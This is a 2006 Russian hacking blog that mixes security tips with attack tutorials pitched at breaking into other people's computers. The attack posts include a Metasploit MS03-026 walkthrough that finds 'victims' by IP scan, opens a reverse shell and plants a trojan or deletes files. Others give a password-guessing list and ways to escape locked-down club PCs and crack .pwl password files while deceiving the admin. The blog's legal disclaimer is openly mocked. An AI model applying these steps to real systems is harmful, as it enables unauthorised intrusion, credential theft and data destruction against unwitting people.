-Видео

Гоним
Смотрели: 39 (0)

 -Подписка по e-mail

 

 -Поиск по дневнику

Поиск сообщений в _Hacking_

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 11.05.2006
Записей:
Комментариев:
Написано: 4992




ВыНу как ?пользователь зашедший на этот дневник с 17.05.2006 !!!!!!!!!!!!!!!!!!!!!! ! Веду сообщество Боба Марли - B_M_C !!!

ГЫ-ГЫ-ГЫ jhvdkbzsfp...

Четверг, 11 Мая 2006 г. 22:27 + в цитатник
Место для флуда и не только...
Рубрики:  А просто...

Без заголовка

Четверг, 11 Мая 2006 г. 22:24 + в цитатник
Ура первые пч !!! Shi,Reena_Star и streco3a ДОБРО ПОЖАЛОВАТЬ !!!
Рубрики:  А просто...

Как же обезопасить свой аккаунт от похищения?

Четверг, 11 Мая 2006 г. 22:23 + в цитатник
Как же обезопасить свой аккаунт от похищения? Есть несколько несложных правил, соблюдая которые можно быть уверенным, что пароли не будут похищены: Никогда не делать общедоступными целые диски или системные папки, даже только на чтение и под паролем. Все расшареные папки делать доступными только для чтения, если необходимо сделать возможным закачивать файлы на машину, то нужно разрешить полный доступ к отдельной пустой папке, например Incoming. В Windows 98 никогда не включать удаленное администрирование. Отключить парольный кэш. Для этого надо найти ключ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Network и изменить параметр DisablePwdCaching с 0 на 1, если не существует - создать (он имеет тип DWORD или Binary в терминологии Norton Regedit). Все исполняемые файлы и архивы, скачиваемые из интернета, а также все файлы, приходящие по почте проверять на наличие вирусов. Это защитит от всевозможных троянов. Придумывать сложные пароли, содержащие прописные и строчные буквы, цифры, прочие символы, длиной не менее 8 символов. Это сделает невозможным подбор. Не предоставлять всем подряд физический доступ к компьютеру.
Рубрики:  Защита

Защита ICQ

Четверг, 11 Мая 2006 г. 22:20 + в цитатник
может надо кому...
Рубрики:  Защита

Кевин Митник ,хакер №1

Четверг, 11 Мая 2006 г. 22:18 + в цитатник
...
Рубрики:  Инфа

ВЗЛОМ ЧАТА,ВЗЛОМ ФОРУМА

Четверг, 11 Мая 2006 г. 21:21 + в цитатник
если знаешь , что такое CGI, то жми...
Рубрики:  Взлом

Внимание !!!

Четверг, 11 Мая 2006 г. 21:18 + в цитатник
Вы не должны использовать материалы для получения доступа к закрытым ресурсам, взлома почтовых ящиков, систем управления счетами, сайтов, управления чужими компьютерами. Вы обязуетесь не создавать вредоносных программ, тем более глобального масштаба и способных принести ощутимый вред. Читая разделы дневника, Вы соглашаетесь с данными требованиями. В противном случае - закройте данную страницу.

ХА-ХА-ХА забейте на это... ой, что это со мной?...
Рубрики:  А просто...

Взлом удаленного компьютера через интернет

Четверг, 11 Мая 2006 г. 21:12 + в цитатник
я здесь...
Рубрики:  Взлом

!!!!!ATENTION!!!!!

Четверг, 11 Мая 2006 г. 21:09 + в цитатник
Каждый день буду постить новую полезную инфу. WisH [mfh]
Рубрики:  А просто...

Хакер арестован за взлом... вебкамеры :))))

Четверг, 11 Мая 2006 г. 20:51 + в цитатник
Мужчина средних лет, проживавший на Кипре, был арестован по обвинению во взломе вебкамеры девочки-подростка с очевидным намерением сделать снимки жертвы в ее спальне.
Обвиняемый заразил ПК жертвы троянской программой, после чего угрожал девушке разослать ее "эротическое фото" по всем контактам в ее почтовой программе. Девочка обратилась в полицию, и личность виновника была вскоре выяснена.
В настоящее время мужчине грозит судебное разбирательство с довольно серьезными обвинениями - от вторжения в частную жизнь, до совращения малолетних.
Рубрики:  Инфа

Взлом локальной сети

Четверг, 11 Мая 2006 г. 20:48 + в цитатник
Нажми сюда !!!!!!!!!!
Рубрики:  Взлом

Взлом пк эксплоитом

Четверг, 11 Мая 2006 г. 20:47 + в цитатник
Metasploit Framework – это среда, предназначенная для разработки и тестирования эксплоитов. Как раз то, что нам нужно, качай последнюю версию с http://www.metasploit.com/projects/F...sfopcode.html Забыл сказать, что эксплоит – это программа или код, эксплуатирующая(ий) какую-либо уязвимость в программном продукте, короче что-то в этом роде. Metasploit (далее MFS ) выпускается, как для * nix платформ, так и для Win , распространяется бесплатно. Нам нужна версия под Windows . Установка проста, запускаем экзешник, жмем кнопку « Next ». Когда MFS установиться, запустится окно MFSConsole , не торопись его закрывать, подожди пока в нем не появиться консоль mfs >, после этого можешь нажимать « Finish ». Работать с консолью легко, главное привыкнуть и выучить несколько команд.

Я расскажу, как это делать на примере использования одного эксплоита, потому что действия с другими эксплоитами аналогичны. И так, будем использовать известную дыру RPC DCOM в Win 2000 XP . Зная что дыра работает на 135 порту, найдем жертву. Для этого я использовал знаменитый сканер XSpider . Выбираем раздел «Поиск», вводим диапазон IP -адресов, указываем порт 135, жмем кнопку «Старт». IP -адреса помеченные крестиком – потенциальные жертвы.

Теперь вернемся к MFS . Вводим команду show exploits , появиться список
доступных эксплоитов (впечатляет правда?).

Для нашей задачи нужен msrpc_dcom_ms03_026. Печатай команду use msrpc _ dcom _ ms 03_026 , так мы переходим в среду эксплоита. Командой show options , получаем список опций, необходимых для успешной работы. Затем нужно ввести действие, которое должен сделать эксплоит. Делается это так, командой show PAYLOADS , смотрим список, затем задаем командой set PAYLOAD winreverse . Цели для которых используется эксплоит смотрим командой show TARGET , задается командой set TARGET 0 , но в данном случае указывать цель не надо, т.к. она одна. Порт атакуемого задается командой set RPORT 135 , также в данном случае нам не надо его указывать, т.к. он задан по умолчанию. Осталось ввести адрес жертвы, делается это командой set RHOST 172.19. XX . X , и командой set LHOST 172.34. XX . X задаем свой IP -адрес, который можно найти сделав двойной клик по двум мониторчикам в закладке «Сведения». Все, эксплоит готов. Запускается он командой exploit и если система у жертвы не пропатчена или не защищена, ты получишь доступ к командной строке удаленного компьютера, на экране должно высветится C : WINDOWS system 32>_ . Дальше фантазируй. Подскажу лишь, что можно поставить у себя не большой FTP -сервер и с помощью встроенного FTP -клиента, запущенного тобой на взломанной тачке, закачать Троян, и в последствии запустить его, тем самым получить полный доступ к системе.

Ну как понравилось? Мощно! Прикинь, ты базаришь с каким-нибудь чуваком-ломаком по аське, смотришь его IP , подключаешься к нему и пишешь «А что там за фильм у тебя на диске D : под названием Video . avi , он же тебе не нужен? (следует команда D :> del Video . avi )». Представь удивленные глаза чувака-ломака, когда он не обнаружит этого фильма. На этом РЕСПЕКТ вам всем
Рубрики:  Взлом



Процитировано 1 раз

10 методов взлома пароля

Четверг, 11 Мая 2006 г. 20:45 + в цитатник
1) Попытайся залогиниться без пароля. Просто нажми . Если это не работает, залогинься с паролем <пробел> <пробел>.

2) 5% компьютеров используют пароль такой же, как и логин. Например, если логин domain, значит и пароль тоже domain. Идиотизм, да? Попытайся залогиниться, используя логин такой же, как и пароль.

3) Примерно 35% компьютеров используют пароль, вторичный от логина. Обычно ты переберешь около 1000 комбинаций, чтобы найти правильный. Например, если логин JQPublic, попытайся Public, John, JohnQPub, и т.д.

4) В 3-ем варианте ты использовал грубый метод подбора пароля. Достань лучше академический словарь слов и имен. Там приблизительно около 30.000 возможных. Быстрая атака заложена в этом методе (приблизительно 800 слов/мин).

5) Сейчас попытайся использовать лист с английскими словами. Там где-то 150.000 слов таких, как оригинальные или известные имена стандартных слов, научные термины, другие языки и т.д.

6) Если это не сработает, время найти специалиста по этим делам. Используй национальный словарь и лист c образцами. Там около 2.500.000 комбинаций. Там есть все, даже игры! Но перебор займет очень много времени. Будь уверен, что ты используешь это не на перегруженном сервере. Если он будет медленным или перегруженным, ты будешь в глубокой жопе.

7) О боже, еще не заработало? Попытайся использовать тот же словарь, только с фильтром. Я имею ввиду, допустим, слово Secret может быть, как SeCrEt, Secr3t, и т.д. Тут больше 1.000.000.000 комбинаций.

8) Используй английский словарь с фильтрами. Похоже, как и в 7-ом методе, но со всеми анклийскими словами.

9) Еще не заработало??? Если ты проделал все выше описанные действия безрезультатно, то возможно ты имеешь дело с чем-то серьезным. Наверняка, система содержит чрезвычайно секретную информацию. Ты действительно хочешь продолжить? Возможно, ты уже в глубокой жопе, если не можешь получить доступа. Используй национальный словарь с фильтрами. Там более 250.000.000 комбинаций. Тебе потребуется около 18 часов, чтобы закончить этот метод. Работай, дружок, работай.

10) Используй специальную программку (такую, как Claymore). Она тупо подбирает всевозможные буквы, цыфры и друие символы. Никто еще не заканчивал это удачно (обламывало подбирать). Там более 205.000.000.000 возможных комбинаций. Если ты не хочешь заниматься этим, выбери другую мишень.
Рубрики:  Взлом

ТЕЛЕФОННЫЕ СЕТИ И ФРИКИНГ

Четверг, 11 Мая 2006 г. 09:55 + в цитатник
Полезная инфа
Рубрики:  Инфа

Остаться анонимным в Сети

Четверг, 11 Мая 2006 г. 09:53 + в цитатник
И на меня нажми
Рубрики:  Защита

Защита Wi-Fi сетей. Методы защиты.

Четверг, 11 Мая 2006 г. 09:52 + в цитатник
Нажми на меня
Рубрики:  Защита

Кто есть кто

Четверг, 11 Мая 2006 г. 09:33 + в цитатник
Начнём с того, что из 10 хакеров 9 из них - абсолютные ламеры. Для начала дадим определение слову "Хакер" - программист экстра класса, умеющий не только писать собственные программы, но и взламывать чужие, как правило истинные Хакеры делают взлом ради интереса. Кто же такие всё-таки Хакеры? Беспощадные Вандалы?, чистильщики сетей? или просто-напросто люди, которым интересно, как детям, что там внутри. Конечно же хакеры у нас ассоциируются со взломами, отформатированными винчестерами, сидящими на халяве за счёт нас. На самом деле Хакеры не так кровожадны, как описывают средства массовой информации. Именно средства массовой информации сделали имидж хакерам. Представив их кровопийцами, которые охотятся за байтами и килобайтами с наших носителей, которые сносят ради своего детского удовлетворения всё на своём пути. Когда на самом деле хакер - это некий стиль жизни. Хакеры простых пользователей сети не атакуют, мы попросту не интересны им. Большинство атак осуществляется теми 9 из 10 хакерами, то есть ламерами, которые взламывают плохо администрируемые системы при этом пользуясь как уже давно известными дырами и багами так и программами написанными хакерами. Так что на данном сайте мы будем говорить о простых пользователях, которые возомнили себя истинными Хакерами. Наверное вы не раз встречались сидя на чатах, с тем, что кто-то пишет сообщения от вашего имени или вставляет картинку в чат, когда такие действия администраторами не разрешены. Вот именно эти люди и называют сабя хакерами, хотя таковыми и не являются - это "Хацкер". Вы наверное уже поняли, как отличить хакера от хацкера, с которым мы встречаемся ежедневно.
Хакеры не офишируют свою деятельность и большее время проводят в изучении и выявлении новых дыр и багов, изучая при этом не один и не два языка программирования, а на много больше, перерывают море книжек и сотни миллионов интернет-страниц в поисках знаний. Хацкеры наоборот орут на каждом углу, что они круче всех, при этом очень часто не могут даже написать простой exe файл. За хакеров написано много и пересказывать уже понятные каждому понятия я не хочу. У каждого о них своё мнение, кто-то относится к ним с презрением, другие ставят их кумирами, даже существует мода на хакеров, но всё это лишь видимое.
Фрикеры- Tелефонные пираты преодолевают системы защиты сотовых и пейджинговых сетей, междугородной и международной связи и вообще имеют дело со всем, что так или иначе относится к радиотехнологиям. Как правило, это отличные специалисты в области радиоэлектроники и мобильных коммуникаций. Они получают бесплатный доступ в сотовые сети, перехватывают пейджинговые сообщения легальных пользователей, прослушивают телефонные разговоры и т.д. В одиночку работают очень редко. Чаще они образуют фрикинг-группы, где каждый пиратствует исключительно в своей сфере. Деятельность групп делится на коммерческую и некоммерческую. Одни занимаются телефонным пиратством, преследуя сугубо личные цели, другие извлекают из этого материальную выгоду, работая на заинтересованных лиц. Услуги фрикеров пользуются большим спросом и являются очень прибыльным бизнесом.
Картеры- специализируются на взломе кредитных карт и систем защиты в которых используются всем знакомые карты с магнитной лентой (полоской). Преследуют комерческую выгоду или личные интересы. Очень часто создают группы работающие по строгой направленности поиска всевозможных способов генирации и фальсификации кредитных карт в последствии которые используются в личных целях, для извлечения материальной выгоды.
Крякеры- Люди занимающиеся взломам програмного обеспечения, делают его бесплатным и доступным каждому взлмамывают серийные номера программ, регистрации, а так же производят взлом электронных ключей к программам которые их используют. Преследуют как комерческую направленность (взлом на заказ) так и не комерческую.
Трейдеры- Обычно не имеют отношения к софту и взлому. Пользуются психологией и социнженерией для впаривания вам за деньги всяких ненужных товаров. Преследуют комерческую цель для извлечения собственной выгоды в виде денежных средств (грины, тугрики, зайчики)
Под словом Хакер объеденены многие направления взлома иногда хакер может быть специалистом сразу в нескольких областях так как грани очень мягкие и часто пересекаются в повседневной жизни истенного хакера
Рубрики:  Инфа

Взлом клуба

Четверг, 11 Мая 2006 г. 09:32 + в цитатник
Обычно, на компьютере админы убирают все и вся, оставляя только нужные программы в "Пуске", ну и меню "Справка" (которая нам в дальнейшем и пригодится :). Естественно на рабочем столе все убирается. Правый клик отключается (проводник уже не вызовешь...), ну или в крайнем случае пункты меню правого клика становятся недоступны. Сразу хочется внести комментарий по поводу FAQ. Там говорилось: Мол, зайди, отключи в "нужных" файлах запуск Клиента (который стоит на каждой машине, и следит за ней; у каждого клуба свои программки), перезагрузись, и машина в твоем распоряжении. но, оказывается, не все так просто, как хотелось бы некоторым юзверям. Так вот, если этот клиент каким-нибудь образом отключить, то на локальном сервере, который управляет этими компьютерами высветится "Ахтунг!", то есть напротив номера твоей тачки высветится, какая-нибудь фигня. В следствии чего подойдет злобный админ и поотрывает тебе все, что только найдет! Так что такой номер не прокатит. А теперь перейдем собственно к тому, как все-таки получить доступ??? Рассмотрим по степеням "защищенности" начиная слабой и ЗАканчивая... Имеется в виду, что юзер не может получить доступ ни к каким файлам, находящимся на винчестере. Итак.

1. Заходим в Интернет-испортил 5:0 (ну, конечно, не обязательно 5:0 :). И в адресной строке набираем:

"С:\\" (без кавычек, естественно!).

И в большинстве случаев получаем... по морде розовой птицей Обломинго, типа:

"нельзя тебе сынок сюда, маленький еще...".

Поэтому плавно переходим к следующему пункту. Ну а если все-таки тебе повезет, то ты, наверное, можешь дальше и не читать уже, хотя на будущее пригодится.

2.Щелкаем в Интренет-эксплорере правым кликом (это везде разрешено) на любой попавшейся ссылке, и выбираем пункт

"Сохранить объект как"

в появившемся диалоговом окне выбираем

"Тип файла: все файлы".

Ну и соответственно получаем доступ ко всем файлам диска (а также дискОВ, и сети), откуда без труда запускаем любой файл ;).

3. Следующий способ для тех, у кого нет интернета (например просто компьютерный зал). Входим в меню "Пуск", кликаем на "Помощь" -> открывается Виндозная справка. Сворачиваем её, кликаем правой кнопкой (ну или с клавы вызываем меню правого клика) и выбираем "Jump to URL", где пишем "С:\\". В отличие от первого случая, птица Обломинго с бешеным криком проносится мимо вас >:). Что, говоришь, нет в "Пуске", меню "Хельп"? Вот беда-то... что-же делать? Может попробовать на рабочем столе нажать пимпочку "F1"?

4. Ну и простой способ: Кликаешь в пуске "Найти..", ставишь маску файла *.* (что? говоришь не знаешь, что такое маска? А так это просто, эта такая фигня, которую ты надеваешь на свою физиономию на маскарад, или когда пытаешься прикинуться шлангом), ну и получаешь опять же доступ к чему-нибудь. Кстати, для тех, кто не знает, что делать ,если в "Пуске" нет пункта "найти": не надо мне посылать корзину матов, а просто попробуй нажать на кнопочку "эФ_три". Вот, пожалуй, почти все, если че еще придумаю - намылю.
Данная статья была написана для того, чтобы показать админам возможные способы "взлома", так что думайте, как их затыкать :). И еще, обычно, когда приходит пользователь че-нить поюзать, ему тачка загружена под сеансом с минимальными привилегиями. Так вот, получив доступ к файлам ты получаешь доступ к *.pwl-файлам, без труда их расшифровав, принесенным тобой чем-нибудь для расшифровки (во, блин, сказал!). Но не забывайте, если единственный дисковод в зале на сервере, то вам придется просить админа перекинуть файл с дискеты. А он может (не может а должен!) заинтересоваться: "А что это за *.ехе". Так что заранее поменяй расширение файла на какой-нибудь *.doc. А если спросит: "Че так много весит?" - прикидывайся шлангом (см. выше) и говори: "Да так картинок всяких много...". Большой привет тому челу (Фантом, по-моему), который в ответ на мою прошлую статью прислал письмо с аттачем Doc1.doc.lnk :) Большое спасибо за оччень интересный документ. Только вот почему-то прочитать его не удалось, сами собой поформатировались винчестеры, сгорела оперативка, выплюнулся проц (и прям на пол, представляешь?) и сгорели все диоды на системном блоке :(. Так что, если не жалко, пришли пожалуйста этот документ еще раз, я его в этот раз на сервере почитаю, может, все будет нормально?
Рубрики:  Взлом

Защита от "шпионов"

Четверг, 11 Мая 2006 г. 09:27 + в цитатник
Эта статья посвящена проблеме защиты от клавиатурных шпионов. К сожалению, вычислить установленного шпиона на компьютере не так уж и легко. Многие антивирусные программы, конечно, способны методом углублённого сканирования обнаружить "шпиона", но во многих случаях им это не "по зубам" из-за того, что многие нормальные программы, например, как Photochop и другие, подобные ей программы очень часто используют функцию KeyboardHook для отлова нажития клавиши Print Screen. Однако в отличии от программ "шпионов" они не записывают в лог файл нажатые клавиши пользователем. Многие ведущие антивирусные программы ищут "шпионов" на основе именно записи в лог файл, создавая ложную матрицу, на которую должен среагировать "шпион", а зачастую методом изучения кода и сопоставлением его с имеющимся в базе удаётся отловить распространённые клавиатурные шпионы.

Так же для отлова всех нажатых клавиш для всех процессов в системе обязательным условием является то, что сам шпион находится и вызывается из динамической библиотеки DLL, что позволяет довольно просто с ним бороться, а антивирусным программам легко производить обнаружение. Например, AVP лаборатории Касперского довольно эффективно борется с клавиатурными шпионами, но, однако, без обновления его антивирусной базы, он будет бесполезен. Радует только то, что каждую неделю для AVP выходят обновления антивирусной базы.

Конечно же надеяться только на антивирусные программы довольно глупо, а вот совместное использование методов антивирусной защиты и копошения в системе ручками может довольно эффективно защитить от подобных атак. Если у вас windows 98 или выше вам доступна функция "Систем инфо" (информация о системе находится в пункте "служебные программы") Запустив её, вы можете узнать, что у вас в системе грузится и, сбросив галочку с пункта, отменить загрузку того или иного приложения, на которое падает тень сомнения. Конечно "систем инфо" полезна только тем, кто понимает, что именно системе нужно, а что нет. Если же вы не понимаете, что грузит ваша система, советую воспользоваться программами, способными просматривать реестр windows и удалять оттуда соответствующие ключи.

Таких программ на сегодняшний день достаточно много, найти их можно на www.freeware.ru и подобных сайтах, предоставляющих бесплатный софт. При использовании таких программ, вы сможете не только почистить ваш реестр от уже несуществующих программ на вашем диске, но и определить, что же за ключ прописан в вашем реестре и к какому программному приложению он относится и в случае, если вы не пользуетесь этим приложением или если вы его не устанавливали, можете удалить из системы (сомневаюсь, что вы не помните, что устанавливали, а что нет).

Конечно это не на 100% защитит вас от "шпионов", но в какой-то мере, скажем на 80 %, позволит обнаружить, а при совместном использовании с антивирусной программой практически наверняка избавит от подобных атак и от утечки информации с вашего компьютера.
Рубрики:  Защита

Дневник _Hacking_

Четверг, 11 Мая 2006 г. 09:19 + в цитатник
В этом дневнике будет информация о том как использовать и как защититься от Hacking'a
Хакинг- думаю все догадались это- взлом и проникновение на чужой компьютер.
Выложу всю информацию которую имею. Если у вас есть желание так же оставляйте свою инфу.
Вся инфа проверена... не однократно занимался хакерством,а как известно лучше хакера в защите никто не поможет. Вам нужна помощь? Как взломать компьютер друга? Как защититься от взлома? Вы этог не знаете ?Тогда вам сюда !
WisH [mfh]
Рубрики:  А просто...


Поиск сообщений в _Hacking_
Страницы: 9 ..
.. 3 2 [1] Календарь